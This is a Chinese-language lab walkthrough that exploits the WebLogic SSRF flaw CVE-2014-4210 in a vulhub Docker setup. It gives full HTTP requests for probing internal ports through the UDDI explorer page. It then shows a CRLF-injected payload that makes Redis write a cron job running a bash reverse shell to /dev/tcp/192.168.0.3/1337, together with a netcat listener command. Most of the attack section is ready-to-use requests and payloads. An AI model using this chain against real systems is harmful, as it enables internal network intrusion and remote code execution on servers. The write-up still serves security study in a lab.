本文主要記錄一下Weblogic SSRF 利用的操作過程。
一、WebLogic SSRF漏洞簡介
漏洞編號:CVE-2014-4210
漏洞影響:
版本10.0.2,10.3.6
Oracle WebLogic Web Server既可以被外部主機訪問,同時也允許訪問內部主機。可以用來進行端口掃描等。
二、環境介紹
本次實驗的環境使用的是phith0n vulhub 中的Weblogic SSRF
將vulhub項目git到本地,切換到vulhub/weblogic/ssrf目錄下:
2.1 編譯及啟動測試環境
下載環境需要費點時間,建議先更換好軟件源並更新系統后再使用如下命令:
docker-compose build
docker-compose up -d
下載,啟動之后:
root@starnight:~/vulhub/weblogic/ssrf# sudo docker ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES 15c99ad8d813 vulhub/weblogic "startWebLogic.sh" 33 minutes ago Up 33 minutes 5556/tcp, 0.0.0.0:7001->7001/tcp ssrf_weblogic_1 bd7ff0826028 ssrf_redis "/usr/local/bin/do..." 33 minutes ago Up 33 minutes 6379/tcp ssrf_redis_1
2.2 訪問測試
訪問本地機器,這里為: http://192.168.0.12:7001/uddiexplorer/
可以看到,服務已經正常啟動。
三、漏洞測試
3.1 端口開放測試
SSRF漏洞存在於http://your-ip:7001/uddiexplorer/SearchPublicRegistries.jsp,訪問一個可以訪問/不能訪問的端口得到的結果是不一樣的。
可訪問的端口將會得到錯誤,一般是返回status code(如下圖),如果訪問的非http協議,則會返回did not have a valid SOAP content-type
可訪問的端口
本地機器的7001端口肯定是可以訪問的。
GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001/ HTTP/1.1 Host: 192.168.0.12:7001 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Cookie: publicinquiryurls=http://www-3.ibm.com/services/uddi/inquiryapi!IBM|http://www-3.ibm.com/services/uddi/v2beta/inquiryapi!IBM V2|http://uddi.rte.microsoft.com/inquire!Microsoft|http://services.xmethods.net/glue/inquire/uddi!XMethods|; JSESSIONID=XQX3hSRp5Jzp6p2PwFTZKFvQcSRG2gnTyvmDWzy5XC4rhrhnvnY3!1711855106 DNT: 1 Connection: close Upgrade-Insecure-Requests: 1
不可訪問端口
如端口7000,此端口並未開放。
GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7000/ HTTP/1.1 Host: 192.168.0.12:7001 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Cookie: publicinquiryurls=http://www-3.ibm.com/services/uddi/inquiryapi!IBM|http://www-3.ibm.com/services/uddi/v2beta/inquiryapi!IBM V2|http://uddi.rte.microsoft.com/inquire!Microsoft|http://services.xmethods.net/glue/inquire/uddi!XMethods|; JSESSIONID=XQX3hSRp5Jzp6p2PwFTZKFvQcSRG2gnTyvmDWzy5XC4rhrhnvnY3!1711855106 DNT: 1 Connection: close Upgrade-Insecure-Requests: 1
3.2 注入HTTP頭,利用Redis反彈shell
Weblogic的SSRF可以通過傳入%0a%0d來注入換行符,而某些服務(如redis)是通過換行符來分隔每條命令,也就說我們可以通過該SSRF攻擊內網中的redis服務器。(參考鏈接一中有些筆誤)
先探測一下內網中:172.*.*.* 的redis服務器,我們可以用上3.1的端口探測,來探測Redis 6379端口。
探測端口
GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://172.18.0.2:6379/ HTTP/1.1 Host: 192.168.0.12:7001 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Cookie: publicinquiryurls=http://www-3.ibm.com/services/uddi/inquiryapi!IBM|http://www-3.ibm.com/services/uddi/v2beta/inquiryapi!IBM V2|http://uddi.rte.microsoft.com/inquire!Microsoft|http://services.xmethods.net/glue/inquire/uddi!XMethods|; JSESSIONID=XQX3hSRp5Jzp6p2PwFTZKFvQcSRG2gnTyvmDWzy5XC4rhrhnvnY3!1711855106 DNT: 1 Connection: close Upgrade-Insecure-Requests: 1
由此,我們知道docker環境中地址172.18.0.2,在端口6379運行Redis 服務。
反彈shell
在本地局域網的一台機器192.168.0.3上進行監聽:nc -lvv 1337 (更改成自己機器的實際地址)
將如下數據進行Urlencode, 可使用在線工具:
test set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.0.3/1337 0>&1\n\n\n\n" config set dir /etc/ config set dbfilename crontab save aaa
GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://172.18.0.2:6379/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn%2A%20%2A%20%2A%20%2A%20%2A%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.0.3%2F1337%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa HTTP/1.1 Host: 192.168.0.12:7001 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Cookie: publicinquiryurls=http://www-3.ibm.com/services/uddi/inquiryapi!IBM|http://www-3.ibm.com/services/uddi/v2beta/inquiryapi!IBM V2|http://uddi.rte.microsoft.com/inquire!Microsoft|http://services.xmethods.net/glue/inquire/uddi!XMethods|; JSESSIONID=XQX3hSRp5Jzp6p2PwFTZKFvQcSRG2gnTyvmDWzy5XC4rhrhnvnY3!1711855106 DNT: 1 Connection: close Upgrade-Insecure-Requests: 1
我們可以看到成功的反彈了shell(反彈shell的過程略微有點慢,稍候...)
